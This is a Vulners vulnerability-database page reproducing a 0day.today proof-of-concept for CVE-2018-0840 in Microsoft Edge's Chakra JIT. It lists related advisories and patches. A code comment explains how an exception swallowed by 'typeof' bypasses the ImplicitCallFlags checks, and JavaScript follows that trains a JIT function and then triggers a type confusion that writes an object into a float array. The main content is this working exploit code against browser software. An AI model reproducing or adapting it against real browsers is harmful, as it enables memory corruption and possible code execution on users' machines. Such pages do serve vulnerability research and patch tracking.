Vulners
Lucene search
Microsoft Edge Chakra JIT - ImplicitCallFlags Checks Bypass Exploit
| Reporter | Title | Published | Views | Family All 63 |
|---|---|---|---|---|
 | CVE-2018-0840 | 15 Feb 201800:00 | – | circl |
 | Microsoft Edge and ChakraCore Remote Memory Corruption Vulnerability (CNVD-2018-03519) | 14 Feb 201800:00 | – | cnvd |
 | Microsoft Browser Scripting Engine Memory Corruption (CVE-2018-0840) | 13 Feb 201800:00 | – | checkpoint_advisories |
 | CVE-2018-0840 | 15 Feb 201802:00 | – | cve |
 | CVE-2018-0840 | 15 Feb 201802:00 | – | cvelist |
 | February 13, 2018—KB4074588 (OS Build 16299.248) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074590 (OS Build 14393.2068) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074591 (OS Build 10586.1417) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074592 (OS Build 15063.909) | 13 Feb 201808:00 | – | mskb |
| February 13, 2018—KB4074593 (Monthly Rollup) | 13 Feb 201808:00 | – | mskb |
10
/*
Here's a snippet of ExecuteImplicitCall which is responsible for updating the ImplicitCallFlags flag.
template <class Fn>
inline Js::Var ExecuteImplicitCall(Js::RecyclableObject * function, Js::ImplicitCallFlags flags, Fn implicitCall)
{
...
Js::ImplicitCallFlags saveImplicitCallFlags = this->GetImplicitCallFlags();
Js::Var result = implicitCall();
this->SetImplicitCallFlags((Js::ImplicitCallFlags)(saveImplicitCallFlags | flags));
return result;
}
It updates the flag after the implicit call. So if an exception is thrown during the implicit call, the flag will remain not updated. And the execution will be broken until the exeception gets handled. Namely, if we can ignore the exception in any way, we can bypass the ImplicitCallFlags checks.
At this point, "typeof" comes to rescue. The weird handler for "typeof" catchs execptions and clears them. For example, in the following code, the exeception thrown from toString will be ignored.
let o = {
toString: () => {
throw 1;
}
};
typeof(this[o]);
So, we can bypass the ImplicitCallFlags checks by throwing an exception and clearing it using "typeof".
*/
function opt(arr, index) {
arr[0] = 1.1;
typeof(arr[index]);
arr[0] = 2.3023e-320;
}
function main() {
let arr = [1.1, 2.2, 3.3];
for (let i = 0; i < 0x10000; i++) {
opt(arr, {});
}
opt(arr, {toString: () => {
arr[0] = {};
throw 1;
}});
print(arr[0]);
}
main();
# 0day.today [2018-03-14] #Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Feb 2018 00:00Current
7.5High risk
Vulners AI Score7.5
EPSS0.7974